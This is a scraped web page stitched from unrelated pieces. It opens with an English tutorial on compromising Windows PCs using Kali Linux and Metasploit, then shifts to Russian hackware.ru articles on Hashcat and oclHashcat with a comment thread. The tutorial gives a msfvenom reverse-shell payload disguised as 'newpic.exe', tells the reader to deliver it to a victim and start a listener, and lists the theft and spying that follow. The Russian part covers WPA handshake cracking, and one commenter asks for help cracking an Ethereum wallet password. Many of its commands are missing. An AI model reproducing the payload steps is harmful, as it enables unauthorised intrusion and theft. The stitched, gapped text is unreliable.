How To Hack Windows PC Using Kali Linux and Metasploit

Metasploit provides you with lots of exploits and payloads that you can use to hack any windows pc. In this post, i will show you how hackers use kali linux and metasploit to hack windows.

Just like RATs, you can create metasploit payloads and deliver them to your victim. Then you need to start a listener in metasploit to accept incoming connections. When your victim open the the file you will get a connection back and you can perform all short of tasks remotely.

Using this method hackers steal sensitive information like account details, login email and passwords, media files and much more like they can also execute system commands remotely and play with your system on root level. To get more Ethical Hacking tutorials, go to below link

So let’s see how hackers do that.

Step 1- In kali linux, open the terminal and use this command to generate payload.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.1 lport=4444 -o newpic.exe

In this example, 192.168.43.1 is my and ip address (you need to use your ip address here) and 4444 is the port number that i want to use.

Now you will have a new payload file named newpic.exe (whatever name you used while creating payload) in root folder.

Step 2- You need to deliver this malicious file to your victim.

Step 3- Start the listener to accept incoming connection. Open terminal, type msfconsole and press enter to open the metasploit tool.

There is an exploit in metasploit used to handle reverse connections. We will use that. Enter these commands in terminal one by one to start the listener.

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.43.1

It will start listening for incoming connections over port 4444.

Step 4- Everything is up, now wait for your victim to click on your payload file and when your victim click and open the file you will get a session.

And that’s how hackers hack any windows pc. After getting session, you can perform all sort of tasks like uploading and downloading any file from and to victim’s system, screenshot capturing, capturing pictures using webcam, recording voice using mic and much more.

This is just an example of how hackers hack windows, there are lots of various methods you can use.

Инструменты Kali Linux

Список инструментов для тестирования на проникновение и их описание

Hashcat

Hashcat — это самый быстрый в мире восстановитель (взломщик) паролей.

В настоящее время, Hashcat объединила в себе две ранее существовавшие отдельные ветки программы. Одна так и называлась Hashcat, а вторая называлась oclHashcat (а ещё раньше oclHashcat была разделена на собственно oclHashcat и cudaHashcat). В настоящее время абсолютно все версии слиты в одну, которая при восстановлении паролей использует центральный процессор и видеокарту.

• Самый быстрый в мире взломщик
• Первый и единственный в мире внутриядерный движок правил
• Бесплатная
• Открытый исходный код (лицензия MIT)
• Мультиплатформенная (Linux, Windows и OSX)
• Мультиплатформенная (CPU, GPU, DSP, FPGA и т.д., всё, что поставляется со средой выполнения OpenCL)
• Множество хешей (одновременный взлом множества хешей)
• Задействует несколько устройств (использует множество устройств на одной системе)
• Задействует устройства разных типов (использует устройства разных типов на одной системе)
• Поддержка распределённых систем взлома (с помощью дополнительного сегмента)
• Интерактивная поддержка паузы / возобновления
• Поддержка сессий
• Поддержка восстановления
• Поддержка чтения кандидатов в пароли из файла и стандартного ввода
• Поддержка шестнадцатеричных солей и шестнадцатеричных наборов символов
• Поддержка автоматической тонкой настройки производительности
• Поддержка автоматического поорядка пространства ключей цепей Маркова
• Встроенная система бенчмарков
• Интегрированный тепловой сторож
• 160+ реализованных с мыслью о производительности типов хешей
• … и многое другое

Справка по Hashcat

Руководство по Hashcat

Страница man отсутствует.

Примеры запуска Hashcat

Запуск бенчмарка -b

Взлом WPA2 WPA рукопожатий с Hashcat

Очистка ваших файлов .cap программой wpaclean

Конвертируем файл .cap в формат, который будет понятен oclHashcat. Для ручной конвертации .cap используйте следующие команды в Kali Linux.

Обратите внимание, что, вопреки логике, сначала идёт выходной файл, а потом входной . Казалось бы, логичнее было . Запомните это, чтобы не терять время на выяснение проблемы.

В моём случае команда выглядит так:

Конвертация файлов .cap в формат .hccap

Нам нужно конвертировать этот файл в формат, понятный oclHashcat.

Для его конвертирования в формат .hccap с помощью aircrack-ng нам нужно использовать опцию -J

Обратите внимание -J это заглавная J, а не маленькая j.

В моём случае команда следующая:

Атака по словарю на рукопожатие:

Атака брутфорсом на рукопожатие:

Установка Hashcat

Программа предустановлена в Kali Linux.

Установка Hashcat в другие Linux

Далее перейдите на официальный сайт и скачайте архив.

Запустите файл hashcat64.bin или hashcat32.bin в зависимости от битности вашей системы.

Установка в Windows

Скачайте архив с официального сайта, распакуйте его.

Для запуска используйте файл hashcat64.exe или hashcat32.exe в зависимости от битности вашей системы.

Программу нужно запускать в командной строке. Для этого откройте окно командной строки (Win+X – выберите «Командная строка») и перетащите туда исполняемый файл.

Либо в открывшемся окне командой строки перейдите в требуемую папку:

HackWare.ru

Этичный хакинг и тестирование на проникновение, информационная безопасность

Как установить oclHashcat в Kali Linux 2

Эта статья является частью цикла, в который входят следующие заметки:

Описание oclHashcat и сравнение с Hashcat

oclHashcat — это инструмент для продвинутого восстановления пароля.

oclHashcat — это взломщик множества хешей, его особенная мощь обусловлена задействованием производительности графической карты, он использует метод перебора (атака брут-форс) — реализованную как атака по маске, комбинированную атаку, атаку по словарю, гибридную атаку, атаку по маске и атаку на основе правил. Программа является кроссплатформенной и имеет родные исполнимые файлы для Linux и Windows.

По сути, oclHashcat — это Hashcat, который использует мощь графического процессора.

В прошлом было много популярных версий: oclHashcat-plus, oclHashcat-lite, clHashcat GPU cracker — все они хорошо себя зарекомендовали, но в настоящее время являются устаревшими. Весь их функционал был слит в oclHashcat.

Установка oclHashcat в Kali Linux

Для работы программы необходимы драйверы графических карт:

• пользователям NVidia нужен ForceWare 346.59 или более поздний
• пользователям AMD нужен 14.9 или более поздний

На этом установка закончена. Запускать так

Кстати, программу можно скачать и с официального сайта. Причём в этом есть два больших плюса: а) всегда самая свежая версия, б) в установленном виде занимает в два раза меньше места, поскольку вы скачиваете версию под AMD или под NVidia (при apt-get install oclhashcat ставится всё). На сайте программа уже скомпилирована в исполнимые файлы, достаточно распаковать архив и можно запускать.

Ошибка ATTENTION! Unsupported or incorrect installed GPU driver detected!

После установки драйвера и oclHashcat я попытался запустить бенчмарк, но получил предупреждение:

С драйвером у меня всё впорядке, поэтому мне помогло использование ключа —force:

Справка по oclHashcat

Если вы хотите ознакомиться со всеми опциями oclHashcat, с переведённой ра русский язык справке по oclHashcat, а также с примерами использования, то обратитесь к Энциклопедии Kali Linux: http://kali.tools/?p=538.

Очень много разнообразного материала по *Hashcat вы сможете найти на этом сайте по тэгу oclHashcat (Hashcat).

Бенчмарки из-под Kali Linux

Установка проприетарных драйверов на Linux иногда наталкивается на сложности. При этом в Windows всегда установлены проприетарные драйвера. Установка, кстати, не вызывает каких-либо сложностей. Поэтому интересно сравнить, будет ли скорость перебора отличаться на Linux и на Windows. Поскольку если результат одинаковый, а проприетарный графический драйвер вам так и не удалось установить на Kali Linux, то для выполнения оффлайн брутфорса хешей и взлома паролей вы можете использовать Windows, поскольку oclHashcat является кроссплатформенной программой.

Бенчмарки проводились на компьютере с процессором Intel(R) Core(TM) i7-3630QM CPU @ 2.40GHz и видеокартой Radeon HD 7870M.

Для Hashcat

Для oclHashcat

Бенчмарки из-под Windows

Для Hashcat

Для oclHashcat

Выводы по результатам бенчмарков: разница между использованием Linux и Windows особой нет. Цифры схожие, разница может быть связана не с улучшенной работой на той или иной ОС, а с работой фоновых программ и т. д. — я не особо беспокоился о чистоте тестов, для меня главное было увидеть примерный порядок.

Но зато разница между использованием мощностей центрального вычислительного процессора и графического процессора очень большая. Для некоторых алгоритмов хеширования она различается на порядок.

Если вас заинтересовал перебор хешей с использованием видеокарты под Windows, то пример как это реализовывается вы можете найти в статье «Взлом рукопожатий (handshake) с использованием графического процессора в Windows».

Связанные статьи:

• VNC в Windows и Linux: настройка и аудит безопасности (93.4%)
• Взлом с CUDA GPU в Kali Linux в облаке и на ПК (91%)
• Как в Linux взламывать пароли видеокартой и центральным процессором (84.4%)
• Выбор компьютера и операционной системы для хакера (65.7%)
• Как установить аналог Total Commander в Kali Linux (65.7%)
• Инструкция по использованию sqlmap. Ч.1: Основы работы (GET) (RANDOM — 6.7%)

Рекомендуется Вам:

18 комментариев to Как установить oclHashcat в Kali Linux 2

Как можно обновить oclHashcat. Скачал последнюю версию, теперь у меня при команде:

ERROR: This copy of oclHashcat is outdated. Get a more recent version.

что наверное неправильно. Хотелось бы увидеть запуск как со встроеной в Кали версией, так как у вас в описании.

Ничего неправильного здесь нет. Посмотрите скриншот на сайте: http://hashcat.net/oclhashcat/ Автор там запускает точно также. При этом нам абсолютно ничего не мешает сделать так, чтобы программа запускалась как «родная». Достаточно сделать ссылку /bin/oclhashcat на реальный бинарный файл. Вот готовые рецепты, которые автоматизируют процесс (каждая длинная строка делает следующее: проверяет последнюю версию на сайте, скачивает её, распаковывает, перемещает в соответствущий каталог, делает символьную ссылку на бинарный файл):

Удаление версии из репозитория

Установка 64-битной версии для AMD

Установка 32-битной версии для AMD

Установка 64-битной версии для NVidia

Установка 32-битной версии для NVidia

После этого запуск любой версии одинаковый:

Удаление любой версии, установленной вручную:

Здравствуйте автор, помогите с таким траблом как

я купил на сервере амазон выделенный сервер, проблема в том что при запуске хешкат выдает эту ошибку, если написать -D1 —force то пишет это —

1. обовил драйвера
2. установил после opencl_runtime_16.1.2_x64_setup
3. Intel Driver and Support Assistant Installer
4. intel_aocl_setup_7.0.0.2519

и всеравно после всего проблема осталась, спасибо за ответ и ваши старания, может у вас есть статья как правильно настроить на базе ОС виндовс 10 с нуля для выделенных процессоров например на амазон

Может быть оперативной памяти не хватает? 1GB… Я хотел попробовать воспроизвести проблему на своей виртуальной машине: снизил количество RAM до 1GB – она кое-как загрузилась, теперь я пытаюсь там открыть веб-браузер, чтобы скачать нужные файлы. Если хватит терпения, то дополнительно напишу, получилось воспроизвести проблему или нет.

Понятно, что у вас могут быть какие-то определённые алгоритмы, которые на CPU перебираются лучше чем на GPU, либо ограничения в бюджете, но для взлома паролей, конечно же, нужно брать виртуальные машины с GPU. Кстати, имеются официальные P2 инстанс с Kali Linux и всеми необходимыми драйверами специально для работы hashcat «из коробки». Здесь я писал эту новость.

Я взял практически чистую систему Windows 10 в VirtualBox c 6 GB оперативной памяти.

Попробовал запустить бенчмарк:

получил ожидаемую ошибку:

Т.е. отсутствует OpenCL runtime или драйвер.

Я установил OpenCL™ Runtime 16.1.2 for Intel® Core™ and Intel® Xeon® Processors for Windows* (64-bit & 32-bit). Драйвер для процессора уже идёт в комплекте, никакие сторонние «обновители драйверов» не нужны!

После этого заработал бенчмарк:

Я перезапустил систему для уменьшения оперативной памяти до 1 GB, запустил бенчмарк, который опять заработал:

1) для работы hashcat всё-таки достаточно и 1 GB

2) для работы hashcat в Windows необходимо и достаточно установить только OpenCL™ Runtime for Intel® Core™ and Intel® Xeon® Processors for Windows последней версии – после этого всё будет работать.

Примечание: у меня была «практически» чистая система, поскольку я предварительно для своих целей устанавливал C++ Redistributable Visual Studio 2017 и Распространяемые пакеты Visual C++ для Visual Studio 2013. Не знаю, нужны они для Hashcat или нет.

Вы используете демо версию EC2? Там нужно вводить номер банковской карты или что-то подобное?

Какой процессор в вашей системе EC2?

Запустил бенчмарк специально для алгоритма 15600, т.е. Ethereum Wallet, PBKDF2-HMAC-SHA256:

Т.е. для данного алгоритма видеокарты в разы эффективнее чем центральный процессор.

проблема в том что у меня алгоритм 15700 и dklen»:32,»n»:262144,»p»:1,»r»:8 в коде и тут только процессором, можете что-то подсказать, есть пароль но не подходит почему-то, я так и не разобрался как например создать свой пароль для брута, например я хочу в 7 символе русские буквы большие маленькие и также с английским и спец символы и так же в 12 символе, или во всех перебор конкретных символов, спасибо заранее, было бы круто связаться с вами ТЕТ-А-ТЕТ ваш интерес там будет учтен

Пример пользовательского набора символов в этом комментарии (начните с него, т.к. он попроще): https://hackware.ru/?p=339#comment-3533

В вашем случае нужны большие английские буквы (?u), маленькие английские буквы (?l), русские буквы (АБВГДЕЁЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдеёжзийклмнопрстуфхцчшщъыьэюя), а также специальные символы (?s)

Среди опций создаём пользовательский набор символов (собираем все части вместе):

Сама маска на семь пользовательских символов выглядит так: -1-1-1-1-1-1-1

П.с. пытаться подобрать такой пароль (особенно на 12 символов) для данного алгоритма бесполезно, лень считать, но скорее всего окажется, что даже при переборе на самом мощном компьютере не хватит всего времени существования Вселенной для подбора.

блин помоги бро, уверен таких как я у тебя много за день, но чет реально не могу найти норм инфы с виндой как все это правильно на интеле тупо на проце делать, вечно костыли с ошибками, может есть какой-то комплексный набор утилит и дров?

После установки ругается на файл:

# oclhashcat -boclHashcat v2.01 starting in benchmark-mode…

Device #1: Barts, 512MB, 900Mhz, 14MCU

ERROR: ./kernels/4098/m00900_a3.VLIW5.llvmir: No such file or directory

Да, утром написал не проверив. Сейчас команды подправил и проверил для AMD на 64-битной системе. Перед тем как пробовать, удалите предыдущие файлы:

И там ещё в папке /tmp может быть:

А после этого попробуйте команду из предыдущего сообщения.